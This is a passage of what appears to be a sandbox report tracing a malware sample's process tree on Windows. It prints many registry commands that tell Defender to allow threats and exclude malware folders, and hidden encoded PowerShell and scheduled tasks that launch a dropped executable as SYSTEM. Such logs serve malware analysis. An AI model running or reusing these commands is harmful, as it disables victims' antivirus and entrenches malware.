/reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:6212
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:6416
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:3804
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:6324
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:6408
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:6268
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3776
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4488
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:6508
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4012
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:6784
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:7012
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:7212
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:1212
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:7016
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:7204
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:6860
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:6236
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:5116
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:7044
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:6204
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:7220
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:5500
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:7152
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:7116
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:2832
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:4688
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:6844
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:1664
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:6712
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AqhCymdmIBUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AqhCymdmIBUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QubjZgZsgVxU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QubjZgZsgVxU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XhLCDmquyDmYC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XhLCDmquyDmYC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tSRsKJOgU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tSRsKJOgU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mjUPcNFqgWzmMMVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mjUPcNFqgWzmMMVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PKLMGLEKhliiDLHGb\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PKLMGLEKhliiDLHGb\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gGlzHXLNukBnGkUk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gGlzHXLNukBnGkUk\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:1564
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AqhCymdmIBUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:6196
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AqhCymdmIBUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:6900
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AqhCymdmIBUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:6896
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QubjZgZsgVxU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:5096
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QubjZgZsgVxU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:1060
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XhLCDmquyDmYC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:5156
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XhLCDmquyDmYC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:4348
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:5208
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:4156
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tSRsKJOgU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:3616
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tSRsKJOgU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:6528
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mjUPcNFqgWzmMMVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:3440
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mjUPcNFqgWzmMMVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:6444
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:2576
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:840
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:556
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:5128
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PKLMGLEKhliiDLHGb /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:6332
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PKLMGLEKhliiDLHGb /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:4960
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gGlzHXLNukBnGkUk /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:1164
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gGlzHXLNukBnGkUk /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:5836
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks /CREATE /TN "gMSHVPQdt" /SC once /ST 12:32:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                            PID:2308
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks /run /I /tn "gMSHVPQdt"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:6336
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                              schtasks /DELETE /F /TN "gMSHVPQdt"
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:7096
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                schtasks /CREATE /TN "tYRFAYEmQKskppbAu" /SC once /ST 13:34:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gGlzHXLNukBnGkUk\AwzEvpaQGkMxDYb\eeZKFKo.exe\" C2 /niWBdidbf 385132 /S" /V1 /F
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                PID:7228
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                schtasks /run /I /tn "tYRFAYEmQKskppbAu"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:7240
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 880
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                  PID:4880
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:2948
                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                  PID:7460
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:7796
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:7756
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:7760
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:5504
                                                                                                                                                                                                                                                                                        • C:\Windows\Temp\gGlzHXLNukBnGkUk\AwzEvpaQGkMxDYb\eeZKFKo.exe
                                                                                                                                                                                                                                                                                          C:\Windows\Temp\gGlzHXLNukBnGkUk\AwzEvpaQGkMxDYb\eeZKFKo.exe C2 /niWBdidbf 385132 /S
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:7312
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                              schtasks /DELETE /F /TN "bIIyZWzHnmHiZsesSy"
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:5800
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
